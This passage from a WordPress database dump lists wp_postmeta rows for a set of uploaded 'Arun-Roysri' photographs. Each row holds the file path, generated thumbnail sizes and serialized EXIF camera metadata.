D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477220258\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9728, 4317, '_wp_attached_file', '2018/11/17-Arun-Roysri-copy.jpg'),
(9729, 4317, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/17-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"17-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"17-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"17-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"17-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"17-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476802780\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9730, 4318, '_wp_attached_file', '2018/11/21-Arun-Roysri-copy.jpg'),
(9731, 4318, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/21-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"21-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"21-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"21-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"21-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"21-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477225230\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9732, 4319, '_wp_attached_file', '2018/11/23-Arun-Roysri-copy.jpg'),
(9733, 4319, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/23-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"23-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"23-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"23-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"23-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"23-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:11:\"ARUN ROISRI\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1481563182\";s:9:\"copyright\";s:11:\"ARUN ROISRI\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9734, 4320, '_wp_attached_file', '2018/11/24-Arun-Roysri-copy.jpg'),
(9735, 4320, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/24-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"24-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"24-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"24-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"24-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"24-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476822271\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9736, 4321, '_wp_attached_file', '2018/11/27-Arun-Roysri-copy.jpg'),
(9737, 4321, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/27-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"27-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"27-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"27-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"27-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"27-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476911028\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"27\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9738, 4322, '_wp_attached_file', '2018/11/32-Arun-Roysri-copy.jpg'),
(9739, 4322, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/32-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"32-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"32-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"32-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"32-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"32-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476819680\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9740, 4323, '_wp_attached_file', '2018/11/37-Arun-Roysri-copy.jpg'),
(9741, 4323, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/37-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"37-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"37-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"37-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"37-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"37-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477058065\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9742, 4324, '_wp_attached_file', '2018/11/38-Arun-Roysri-copy.jpg'),
(9743, 4324, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/38-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"38-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"38-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"38-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"38-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"38-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477156972\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9744, 4325, '_wp_attached_file', '2018/11/42-Arun-Roysri-copy.jpg'),
(9745, 4325, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/42-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"42-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"42-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"42-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"42-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"42-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476984838\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"56\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9746, 4326, '_wp_attached_file', '2018/11/43-Arun-Roysri-copy.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(9747, 4326, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:675;s:4:\"file\";s:31:\"2018/11/43-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"43-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"43-Arun-Roysri-copy-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"43-Arun-Roysri-copy-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"43-Arun-Roysri-copy-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"43-Arun-Roysri-copy-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477599507\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:4:\"3200\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9748, 4327, '_wp_attached_file', '2018/11/54-Arun-Roysri-copy.jpg'),
(9749, 4327, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/54-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"54-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"54-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"54-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"54-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"54-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476985960\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"52\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9750, 4328, '_wp_attached_file', '2018/11/55-Arun-Roysri-copy.jpg'),
(9751, 4328, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/55-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"55-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"55-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"55-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"55-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"55-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476816494\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"26\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9752, 4329, '_wp_attached_file', '2018/11/57-Arun-Roysri-copy.jpg'),
(9753, 4329, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/57-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"57-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"57-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"57-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"57-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"57-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477173521\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9754, 4330, '_wp_attached_file', '2018/11/59-Arun-Roysri-copy.jpg'),
(9755, 4330, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/59-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"59-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"59-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"59-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"59-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"59-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476911028\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:2:\"27\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9756, 4331, '_wp_attached_file', '2018/11/62-Arun-Roysri-copy.jpg'),
(9757, 4331, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:799;s:4:\"file\";s:31:\"2018/11/62-Arun-Roysri-copy.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"62-Arun-Roysri-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"62-Arun-Roysri-copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"62-Arun-Roysri-copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"62-Arun-Roysri-copy-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"62-Arun-Roysri-copy-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:5:\"POOKY\";s:6:\"camera\";s:9:\"NIKON D4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1477174784\";s:9:\"copyright\";s:10:\"POOKYZeeta\";s:12:\"focal_length\";s:3:\"135\";s:3:\"iso\";s:4:\"1000\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9758, 4332, '_wp_attached_file', '2018/11/64-Arun-Roysri-copy.jpg'),
